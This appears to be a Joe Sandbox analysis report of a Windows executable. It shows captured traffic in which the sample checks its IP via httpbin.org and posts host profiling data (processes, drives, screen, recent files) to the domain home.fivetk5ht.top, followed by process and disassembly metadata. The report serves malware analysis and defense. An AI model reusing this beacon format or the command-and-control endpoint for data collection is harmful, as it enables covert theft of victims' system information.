                                                          Dec 20, 2024 16:25:49.265261889 CET4944OUTData Raw: 62 2b 36 50 6c 65 34 5c 2f 7a 33 5c 2f 77 41 49 66 4c 38 7a 5a 4e 39 7a 7a 50 38 41 56 78 5c 2f 36 6a 5c 2f 52 5c 2f 72 6e 6e 48 61 67 33 35 33 35 66 31 38 79 74 4a 38 30 6e 33 39 6a 5c 2f 37 48 5c 2f 4c 62 4f 50 54 74 5c 2f 58 36 55 4e 73 58 65
                                                          Data Ascii: b+6Ple4\/z3\/wAIfL8zZN9zzP8AVx\/6j\/R\/rnnHag3535f18ytJ80n39j\/7H\/LbOPTt\/X6UNsXemz\/WRY\/ef+Tf4\/59Kf5f7uH9x8nvL+4+0fr9P6imLHuj3w\/J+9H+s\/1H\/wCr8629r5y\/r5mtL7Pz\/UZ979zsjx5Xmxfve3\/P1\/n1pnluo+f5H83\/AJa9uf8Al0\/Tt754qbf82x32Q\/6o\/uv+WGf
                                                          Dec 20, 2024 16:25:49.265383005 CET2472OUTData Raw: 34 63 38 48 58 6d 69 2b 50 4e 57 5c 2f 34 59 4c 5c 2f 5a 2b 38 52 66 38 4c 48 38 57 7a 65 50 76 48 48 69 47 30 38 61 5c 2f 59 4e 53 38 53 52 57 5c 2f 68 44 37 46 34 47 31 37 77 58 38 50 50 2b 45 62 30 5a 70 39 4d 75 50 2b 45 43 5c 2f 34 53 32 53
                                                          Data Ascii: 4c8HXmi+PNW\/4YL\/Z+8Rf8LH8WzePvHHiG08a\/YNS8SRW\/hD7F4G17wX8PP+Eb0Zp9MuP+EC\/4S2SUax4p1WCH8wP+C2\/\/ACdX8P8A\/s3zwp\/6sf4r1\/UfX8uH\/Bbf\/k6v4f8A\/ZvnhT\/1Y\/xXr+qPomQUPpAcAWc3d8Ur3qlSe3BHEqVueUrPu1Zyesrs8P6ZmBo4P6Mfih7GeMnzw4Hg\/rWYY\/H2VHj\
                                                          Dec 20, 2024 16:25:49.265414953 CET4944OUTData Raw: 52 76 5c 2f 41 4b 31 54 62 66 34 48 78 5c 2f 50 6a 5c 2f 77 43 74 6e 38 76 78 71 48 5c 2f 62 5c 2f 77 43 57 66 5c 2f 31 5c 2f 7a 36 63 66 58 6a 72 51 64 68 44 39 35 66 6e 39 4f 6b 66 50 2b 66 62 38 65 4b 68 62 2b 35 74 2b 6d 66 35 5c 2f 35 50 31
                                                          Data Ascii: Rv\/AK1Tbf4Hx\/Pj\/wCtn8vxqH\/b\/wCWf\/1\/z6cfXjrQdhD95fn9OkfP+fb8eKhb+5t+mf5\/5P171ckT5U+T\/v3n+np9f\/rwxhPnf+P\/AJa\/5\/z+tBVLp\/h\/yIfL\/wCmNRSfnx5v+t61LIf9jZ\/10l\/Xp\/nHSmf3E2x89e3k\/Sg7iGTZ8j\/cfP8Az14\/yO3b8KZ8\/wB9E3\/9O\/4D8z\/TinD7kf
                                                          Dec 20, 2024 16:25:49.386132002 CET2472OUTData Raw: 47 6b 61 6f 4d 4c 47 39 37 59 75 42 49 32 6a 61 34 6b 4b 71 6b 47 71 32 73 62 65 5a 35 63 45 57 6f 32 32 6f 57 6b 4b 57 77 39 37 38 4f 66 38 46 4d 5c 2f 77 42 6f 37 77 6a 34 31 38 52 61 6e 62 36 33 59 65 4f 76 41 64 35 34 72 31 5c 2f 56 5c 2f 44
                                                          Data Ascii: GkaoMLG97YuBI2ja4kKqkGq2sbeZ5cEWo22oWkKWw978Of8FM\/wBo7wj418Ranb63YeOvAd54r1\/V\/DPgz4laZHrFx4Z0PUtXurvTNL0jxPptxYeKtHm0vTpLWztBp+vf2fZPaQfZrNoYUjP5WaB45tdd0EeIYLnwxZ2sX7Ofi39p2807Udd1ODXLP4feC\/2mrn9k7WdOmsYvC89r\/wAJV\/wtW1m+y2P9ojSZNBR7ufXL
                                                          Dec 20, 2024 16:25:49.386200905 CET2472OUTData Raw: 44 6f 59 61 68 69 5a 76 45 4f 68 44 45 53 68 5c 2f 51 66 5c 2f 77 41 50 31 7a 5c 2f 30 61 79 50 5c 2f 41 41 2b 48 5c 2f 77 43 4b 43 6a 5c 2f 68 2b 75 66 2b 6a 57 52 5c 2f 34 66 44 5c 2f 41 50 46 42 58 34 46 58 46 74 34 62 38 50 79 5c 2f 47 69 54
                                                          Data Ascii: DoYahiZvEOhDESh\/Qf\/wAP1z\/0ayP\/AA+H\/wCKCj\/h+uf+jWR\/4fD\/APFBX4FXFt4b8Py\/GiT4n\/Fz4LfBjQ\/gbrvwV0LxJ4w8e658Tte8KeJP+GiPD3iTxf8ABrW\/Al\/8F\/hB8XL7XfDPjrwh4Zu\/FWleIL\/StF01dDvdNnu5ra7muLO0ifT10TXfihpHxL8WfDz4L6X8IPihq\/wU8X+NfiZrnil\/Cl5
                                                          Dec 20, 2024 16:25:49.386221886 CET2472OUTData Raw: 76 77 76 44 34 4f 6c 65 44 52 66 69 58 38 49 66 69 68 65 4a 2b 7a 5a 61 5c 2f 74 57 48 53 50 68 37 64 66 47 75 50 78 4b 33 77 71 31 7a 34 6e 65 42 76 68 50 34 48 62 5c 2f 68 46 50 69 4a 38 43 50 68 39 34 6b 6a 38 54 66 45 6e 78 48 34 5c 2f 30 66
                                                          Data Ascii: vwvD4OleDRfiX8IfiheJ+zZa\/tWHSPh7dfGuPxK3wq1z4neBvhP4Hb\/hFPiJ8CPh94kj8TfEnxH4\/0fVPAGhXOmW7+IfB6DxZHcw6Rr\/gqbxV+dPw\/+hfCFKrVy2lh6FfHY3LKWJxWb+KGFwksyyyGMq5jgPreJzGlho43Awy7HPF4aVVVsO8HiYVYRlSnFfrUPEv6flWtXw2HzWvisXhsJgcwr4LB5J4PY3HU8BmeIwOF


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.649772185.121.15.192804416C:\Users\user\Desktop\pCElIX19tu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:25:51.585129976 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 500222
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708325", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]
                                                          Dec 20, 2024 16:25:51.704917908 CET7416OUTData Raw: 55 4b 65 56 31 59 4f 4d 55 35 75 64 53 6e 61 30 56 4a 72 39 79 38 42 50 42 4c 4e 76 48 76 6a 44 4d 65 44 38 6f 7a 7a 4c 38 68 78 47 57 63 4e 34 7a 69 57 72 6a 4d 79 6f 59 6e 45 30 5a 34 66 42 35 6e 6b 2b 56 79 77 31 4f 6e 68 66 66 39 74 4f 72 6e
                                                          Data Ascii: UKeV1YOMU5udSna0VJr9y8BPBLNvHvjDMeD8ozzL8hxGWcN4ziWrjMyoYnE0Z4fB5nk+Vyw1Onhff9tOrnFGpGUnGCp0al3zOKf4HUV\/Yz\/w6u\/YL\/wCiED\/w53xk\/wDnh0f8Orv2C\/8AohA\/8Od8ZP8A54dfzR\/xPjwn\/wBEDxF\/4c8t\/wDkPX+np\/XP\/FNrjb\/o5XC3\/hozb\/5P1\/p6fxzVHJ2\/H+l
                                                          Dec 20, 2024 16:25:51.704979897 CET4944OUTData Raw: 66 54 45 76 66 44 31 39 70 42 73 70 49 5c 2f 48 4f 72 53 6a 5c 2f 49 6a 36 63 6e 69 4c 78 72 58 38 54 66 2b 49 5a 78 7a 79 4e 50 68 44 42 59 4c 68 37 69 48 41 5a 51 38 74 79 74 71 47 66 56 73 76 7a 4c 44 66 57 35 5a 69 38 43 38 30 6b 36 74 48 48
                                                          Data Ascii: fTEvfD19pBspI\/HOrSj\/Ij6cniLxrX8Tf+IZxzyNPhDBYLh7iHAZQ8tytqGfVsvzLDfW5Zi8C80k6tHHYigqE8bLBx9rGf1dThGpH+8voi0MwyrFUM64SzOhw9xhxFSzbhaGbYmjTx1DF4etisDjsJkssLjqeLwOGeY5nlmXUKWNhg\/b067pxnWjhqldP9Cf8AiJW\/6st\/82M\/\/ERX7Sf8E8f23rX9vn4H698Y7f4bXH
                                                          Dec 20, 2024 16:25:51.705012083 CET2472OUTData Raw: 62 2b 36 50 6c 65 34 5c 2f 7a 33 5c 2f 77 41 49 66 4c 38 7a 5a 4e 39 7a 7a 50 38 41 56 78 5c 2f 36 6a 5c 2f 52 5c 2f 72 6e 6e 48 61 67 33 35 33 35 66 31 38 79 74 4a 38 30 6e 33 39 6a 5c 2f 37 48 5c 2f 4c 62 4f 50 54 74 5c 2f 58 36 55 4e 73 58 65
                                                          Data Ascii: b+6Ple4\/z3\/wAIfL8zZN9zzP8AVx\/6j\/R\/rnnHag3535f18ytJ80n39j\/7H\/LbOPTt\/X6UNsXemz\/WRY\/ef+Tf4\/59Kf5f7uH9x8nvL+4+0fr9P6imLHuj3w\/J+9H+s\/1H\/wCr8629r5y\/r5mtL7Pz\/UZ979zsjx5Xmxfve3\/P1\/n1pnluo+f5H83\/AJa9uf8Al0\/Tt754qbf82x32Q\/6o\/uv+WGf
                                                          Dec 20, 2024 16:25:51.705037117 CET4944OUTData Raw: 36 2b 63 30 2b 4c 4d 54 68 4b 55 34 31 63 78 35 50 71 4f 49 72 38 31 61 70 56 6a 47 4f 45 72 56 4b 6b 4b 56 44 44 77 6e 48 44 34 61 6a 44 46 31 6e 43 68 52 70 77 6a 5a 4b 4d 56 38 6f 5c 2f 74 44 58 5c 2f 6b 2b 46 39 48 30 39 57 49 61 2b 31 6f 54
                                                          Data Ascii: 6+c0+LMThKU41cx5PqOIr81apVjGOErVKkKVDDwnHD4ajDF1nChRpwjZKMV8o\/tDX\/k+F9H09WIa+1oTsBjDQ2NncB1Oef9ddW78d0HOOD8f7dvGMd\/Wvon9orVbS48QaFo1vf2N5Jpmn3dzOLK6iulil1C5SExyNCziOULpyM0MgSVFZGZQroT87V\/ph9HnBUcL4T8OYilKE\/7VnmWaTnTalGaxGY4mlQkpJvmvhKGGd9
                                                          Dec 20, 2024 16:25:51.705117941 CET4944OUTData Raw: 52 76 5c 2f 41 4b 31 54 62 66 34 48 78 5c 2f 50 6a 5c 2f 77 43 74 6e 38 76 78 71 48 5c 2f 62 5c 2f 77 43 57 66 5c 2f 31 5c 2f 7a 36 63 66 58 6a 72 51 64 68 44 39 35 66 6e 39 4f 6b 66 50 2b 66 62 38 65 4b 68 62 2b 35 74 2b 6d 66 35 5c 2f 35 50 31
                                                          Data Ascii: Rv\/AK1Tbf4Hx\/Pj\/wCtn8vxqH\/b\/wCWf\/1\/z6cfXjrQdhD95fn9OkfP+fb8eKhb+5t+mf5\/5P171ckT5U+T\/v3n+np9f\/rwxhPnf+P\/AJa\/5\/z+tBVLp\/h\/yIfL\/wCmNRSfnx5v+t61LIf9jZ\/10l\/Xp\/nHSmf3E2x89e3k\/Sg7iGTZ8j\/cfP8Az14\/yO3b8KZ8\/wB9E3\/9O\/4D8z\/TinD7kf
                                                          Dec 20, 2024 16:25:51.824767113 CET4944OUTData Raw: 47 6b 61 6f 4d 4c 47 39 37 59 75 42 49 32 6a 61 34 6b 4b 71 6b 47 71 32 73 62 65 5a 35 63 45 57 6f 32 32 6f 57 6b 4b 57 77 39 37 38 4f 66 38 46 4d 5c 2f 77 42 6f 37 77 6a 34 31 38 52 61 6e 62 36 33 59 65 4f 76 41 64 35 34 72 31 5c 2f 56 5c 2f 44
                                                          Data Ascii: GkaoMLG97YuBI2ja4kKqkGq2sbeZ5cEWo22oWkKWw978Of8FM\/wBo7wj418Ranb63YeOvAd54r1\/V\/DPgz4laZHrFx4Z0PUtXurvTNL0jxPptxYeKtHm0vTpLWztBp+vf2fZPaQfZrNoYUjP5WaB45tdd0EeIYLnwxZ2sX7Ofi39p2807Udd1ODXLP4feC\/2mrn9k7WdOmsYvC89r\/wAJV\/wtW1m+y2P9ojSZNBR7ufXL
                                                          Dec 20, 2024 16:25:51.824868917 CET4944OUTData Raw: 76 77 76 44 34 4f 6c 65 44 52 66 69 58 38 49 66 69 68 65 4a 2b 7a 5a 61 5c 2f 74 57 48 53 50 68 37 64 66 47 75 50 78 4b 33 77 71 31 7a 34 6e 65 42 76 68 50 34 48 62 5c 2f 68 46 50 69 4a 38 43 50 68 39 34 6b 6a 38 54 66 45 6e 78 48 34 5c 2f 30 66
                                                          Data Ascii: vwvD4OleDRfiX8IfiheJ+zZa\/tWHSPh7dfGuPxK3wq1z4neBvhP4Hb\/hFPiJ8CPh94kj8TfEnxH4\/0fVPAGhXOmW7+IfB6DxZHcw6Rr\/gqbxV+dPw\/+hfCFKrVy2lh6FfHY3LKWJxWb+KGFwksyyyGMq5jgPreJzGlho43Awy7HPF4aVVVsO8HiYVYRlSnFfrUPEv6flWtXw2HzWvisXhsJgcwr4LB5J4PY3HU8BmeIwOF
                                                          Dec 20, 2024 16:25:51.825046062 CET4944OUTData Raw: 5a 6c 2b 44 33 77 61 5c 2f 77 43 43 6c 6e 77 38 5c 2f 61 4c 38 46 65 48 5c 2f 41 49 61 5c 2f 41 70 50 41 63 48 37 62 6e 37 4e 75 72 65 49 37 62 51 50 47 47 68 66 47 54 77 62 34 59 38 44 65 42 39 47 2b 49 48 78 73 2b 44 76 68 5c 2f 54 37 37 78 4e
                                                          Data Ascii: Zl+D3wa\/wCClnw8\/aL8FeH\/AIa\/ApPAcH7bn7NureI7bQPGGhfGTwb4Y8DeB9G+IHxs+Dvh\/T77xN8NfHP7R9tb+JPFfg34hfF\/wD4m+IEd5qegabqf07JGkqNHKiSRuMOkih0YejKwKsPYgisx9B0OSIQSaLpMkIORC+nWbRA5JyI2hKZySc4zkk96\/nzxh8Bcu8XM84Wz7GZ7jspxfCWFxlHLaeGp06lCdfFZxkGc\
                                                          Dec 20, 2024 16:25:51.867116928 CET27192OUTData Raw: 57 43 7a 50 4b 38 54 56 72 55 6f 54 77 58 45 6b 63 52 44 47 30 49 56 36 55 36 57 4a 70 54 56 50 46 54 6a 54 71 30 61 74 4f 72 54 6e 47 46 53 46 53 4d 34 49 2b 65 50 45 58 78 39 5c 2f 5a 6d 74 76 47 50 6a 54 78 56 38 4a 66 67 78 38 61 76 45 39 7a
                                                          Data Ascii: WCzPK8TVrUoTwXEkcRDG0IV6U6WJpTVPFTjTq0atOrTnGFSFSM4I+ePEXx9\/ZmtvGPjTxV8Jfgx8avE9zq3\/BQTUv2pfBvhH4BeNfDn7IPhr4XfDf8AZnu5tK\/Zj8Ha\/oHir9kb49+G\/FPh\/wAcXnjH4meO9U8JeBx4Qs9F0W58HaXrzW2vW91pOleQ+KPDvwD+KM\/jj4Rab8U\/D\/wn+GXwl\/aq+N\/x5\/Zp8T\/
                                                          Dec 20, 2024 16:25:51.988670111 CET8652OUTData Raw: 78 55 48 79 65 58 38 37 37 48 5c 2f 31 76 58 7a 5c 2f 31 39 4d 63 66 68 7a 51 62 65 5c 2f 38 41 33 66 78 49 66 37 6a 75 2b 78 5c 2f 2b 57 57 4f 5c 2f 76 5c 2f 6e 50 34 64 32 66 33 39 6e 7a 5c 2f 77 43 33 5c 2f 77 41 39 75 74 54 53 66 75 39 36 53
                                                          Data Ascii: xUHyeX877H\/1vXz\/19McfhzQbe\/8A3fxIf7ju+x\/+WWO\/v\/nP4d2f39nz\/wC3\/wA9utTSfu96SP8AJJ\/z0\/5Y\/wD1+cf\/AKqZ8rK+149\/leb5f\/LCC3\/z+GPrQaU6nyt+H\/A36akO378O\/wCTzf3uP8M9f85xTPMTy5v4\/M\/dS\/j69f8AJxT\/AJ1jT+P91+vGf89Kf8jffaRM\/uvk\/f8At\/h\/j


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.649778185.121.15.192804416C:\Users\user\Desktop\pCElIX19tu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:25:53.318262100 CET87OUTGET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Dec 20, 2024 16:25:54.592251062 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.64970834.226.108.1554434416C:\Users\user\Desktop\pCElIX19tu.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-20 15:25:25 UTC52OUTGET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-20 15:25:25 UTC224INHTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 15:25:25 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-20 15:25:25 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:10:25:19
                                                          Start date:20/12/2024
                                                          Path:C:\Users\user\Desktop\pCElIX19tu.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\pCElIX19tu.exe"
                                                          Imagebase:0xe20000
                                                          File size:4'432'896 bytes
                                                          MD5 hash:7E467A1F5F56CCEC6F54A2EADD37986E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:10:25:53
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1140
                                                          Imagebase:0x510000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:0.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:11
                                                            Total number of Limit Nodes:1
                                                            execution_graph 13199 7650456 13200 765045c GetLogicalDrives 13199->13200 13201 765041f 13199->13201 13202 765047c 13200->13202 13201->13200 13203 76a0400 13204 76a03a0 13203->13204 13205 76a0441 Process32NextW 13204->13205 13206 76a045f 13205->13206 13207 7690487 13208 7690498 Process32FirstW 13207->13208 13209 76904be 13208->13209

                                                            Executed Functions

                                                            Function 07630C3C Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 348baa438b2abde4b2dfb0cde89cf998b5996c2b7718878f67228e7bd48947fa
                                                            • Instruction ID: 7bd55657f4d439a2a0a754ebe8c6eaefc1f98778e65a806628a4bc84c525be8a
                                                            • Opcode Fuzzy Hash: 348baa438b2abde4b2dfb0cde89cf998b5996c2b7718878f67228e7bd48947fa
                                                            • Instruction Fuzzy Hash: AB1190FB12C105BCA241D5826B60AFA27AFE697730F318417F80BD9205D3649A4FC531
                                                            Function 0769024C Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 540COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X$`
                                                            • API String ID: 0-3773876433
                                                            • Opcode ID: 8ff3f48cd9d3de5e8be508d963cf4ecb54810aaec8eb5957d8950a1b3497dc94
                                                            • Instruction ID: abdc0aaa5ce0dfbe64191afb429c3d8d2298894ed457f92ade6ac317e486692d
                                                            • Opcode Fuzzy Hash: 8ff3f48cd9d3de5e8be508d963cf4ecb54810aaec8eb5957d8950a1b3497dc94
                                                            • Instruction Fuzzy Hash: A6B103FB26C123BDBA4291856B14AFBA76EE6C7730B30843BF807D6542E3944E4B5171
                                                            Function 0769000E Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 680COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 2a44cdfc25829d67c55d1a6a9308832470ed4fae73852bbb464aa07f1a7ec92a
                                                            • Instruction ID: 435b80a74f71ad4a0bd9f2918381147d5549ae9a78b10bda849e0ec372894ce9
                                                            • Opcode Fuzzy Hash: 2a44cdfc25829d67c55d1a6a9308832470ed4fae73852bbb464aa07f1a7ec92a
                                                            • Instruction Fuzzy Hash: 34E1F4FB26C223BDB94281862F54AFA6B6EE6D7730B308037F807D6542E3944E4B5171
                                                            Function 07690000 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 663COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: e80536a2b9019feee75a65c79ba21551c8111c44139e2542c3d0b0771936e774
                                                            • Instruction ID: acc0ca54436e8fd7df3000ceebab3b851bd44c59450ad4068caed12d8a7e1f47
                                                            • Opcode Fuzzy Hash: e80536a2b9019feee75a65c79ba21551c8111c44139e2542c3d0b0771936e774
                                                            • Instruction Fuzzy Hash: 21D1F0FB26C223BDB94281862F54AFA6B6EE6C7730B308037F807D6542E3944E4B5171
                                                            Function 0769002D Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 658COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: caacdc1a4155b7404f671b752db5fc4efae88163b1d70f1b7f6338b759e09826
                                                            • Instruction ID: 60345dabdb9b5297f8db1f5d3695fdebb9f78ac18480cd0a0bcf341ee81fb7f4
                                                            • Opcode Fuzzy Hash: caacdc1a4155b7404f671b752db5fc4efae88163b1d70f1b7f6338b759e09826
                                                            • Instruction Fuzzy Hash: EAD1FFFB26C223BCB94281866F54AFA6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 07690040 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 654COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 9a78ae22e8c3e3d935ed43b56a0587f58fcc276bfc1231ab0fa9f6d851b09573
                                                            • Instruction ID: 4ca3eee4f09662bc1b032e65fc20bc93827a9ec50a038d65dc1a80ac7935541e
                                                            • Opcode Fuzzy Hash: 9a78ae22e8c3e3d935ed43b56a0587f58fcc276bfc1231ab0fa9f6d851b09573
                                                            • Instruction Fuzzy Hash: 28D1E0FB26C223BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 0769005B Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 653COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
                                                            • Opcode ID: 50954231575a16457d7a61fe31962d9c7ad286be207a57879a34cc64f4c13ee2
                                                            • Instruction ID: 876620d879ffbc5f0990886206a307dbedd91b6ddcd9d3cb7358b180072d65c9
                                                            • Opcode Fuzzy Hash: 50954231575a16457d7a61fe31962d9c7ad286be207a57879a34cc64f4c13ee2
                                                            • Instruction Fuzzy Hash: 11D1F1FB26C223BDB94281866B54AFB6B6EE6C7730B308437F807D6542E3944E4B5171
                                                            Function 07690087 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 649COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557263678.0000000007690000.00000040.00001000.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7690000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-934871106
